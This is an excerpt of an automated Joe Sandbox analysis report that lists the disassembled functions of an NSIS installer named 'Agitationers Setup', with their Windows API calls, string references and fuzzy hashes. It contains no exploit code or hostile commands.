Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE

Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040C3
GetSysColor.USER32(00000000), ref: 00404101
SetTextColor.GDI32(?,00000000), ref: 0040410D
SetBkMode.GDI32(?,?), ref: 00404119
GetSysColor.USER32(?), ref: 0040412C
SetBkColor.GDI32(?,?), ref: 0040413C
DeleteObject.GDI32(?), ref: 00404156
CreateBrushIndirect.GDI32(?), ref: 00404160

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54

Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
GetMessagePos.USER32 ref: 004049B5
ScreenToClient.USER32(?,?), ref: 004049CF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07

Strings

f, xrefs: 004049E3

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4

Function 00401D9B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040B818), ref: 00401E20

Strings

Calibri, xrefs: 00401E06

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(000B447F,00000064,000B4483), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58

Function 0040558D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
GetLastError.KERNEL32 ref: 004055E4
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
GetLastError.KERNEL32 ref: 00405603

Strings

C:\Users\user\Desktop, xrefs: 0040558D
C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1229045261
Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
Instruction ID: 602471e653a91b50aa3f697eebcabcd82e3e1e6dca1d35eba90d193cad737e86
Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
Instruction Fuzzy Hash: 2D011A71C00219EADF10DFA1C9047EFBBB8EF14355F10803AD545B6290DB799608CFA9

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
Opcode Fuzzy Hash: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8

Function 00404888 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
wsprintfA.USER32 ref: 0040492E
SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941

Strings

Agitationers Setup: Completed, xrefs: 00404918, 0040491D, 00404923, 00404937
%u.%u%s%s, xrefs: 00404910

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Agitationers Setup: Completed
API String ID: 3540041739-230625191
Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9

Function 00402003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,762323A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,762323A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Strings

Triu,fe$, xrefs: 00402082

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: Triu,fe$
API String ID: 2987980305-1397165661
Opcode ID: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
Opcode Fuzzy Hash: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
Opcode Fuzzy Hash: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28

Function 00405938 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 0040593E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031F9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341E,?,00000006,00000008,0000000A), ref: 00405947
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405958

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405938

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction ID: 7219f54bd6567b4b537029212711971aeb7da606d1672e2911cb7cc87ef8a5af
Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
Instruction Fuzzy Hash: 90D0A7A2102A31AAE10127154C05DCF6A08CF023507040036F200B2191C73C0D418BFE

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction ID: beb49624fd26f69101be82d244f2f6f966a121381cf6cbe5bc22d12f3c535a1a
Opcode Fuzzy Hash: 2b46cb1ea70d3002ff1e12295b5763c1d55ea381a2360d12b4260fd16352c354
Instruction Fuzzy Hash: A0F05E30601621ABC7317B64FE4CA8F7AA4AB18B12751047AF148B21F4CB7848C28BAC

Function 00405A26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004059D1: CharNextA.USER32(?,?,0042BC78,?,00405A3D,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004059DF
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8

lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76233410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 00405A89

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A26

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238515254.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3lH2EWD4wU.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3936084776
Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction ID: ffa0610acded3722bed2d7d96fb1c232a132fb9d66bc0fefd21ab2e8d06464ef
Opcode Fuzzy Hash: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
Instruction Fuzzy Hash: 4EF04C25305D6556C622723A1C89AAF1A04CED3324759073FF891F12D2DB3C8A439DBE

Function 0040503B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040506A
CallWindowProcA.USER32(?,?,?,?), ref: 004050BB

Part of subcall function 0040408B: SendMessageA.USER32(000103E0,00000000,00000000,00000000), ref: 0040409D

Strings

, xrefs: 0040504B

Memory Dump Source

Source File: 00000000.00000002.2238312050.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2238290730.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238332537.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238352545.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
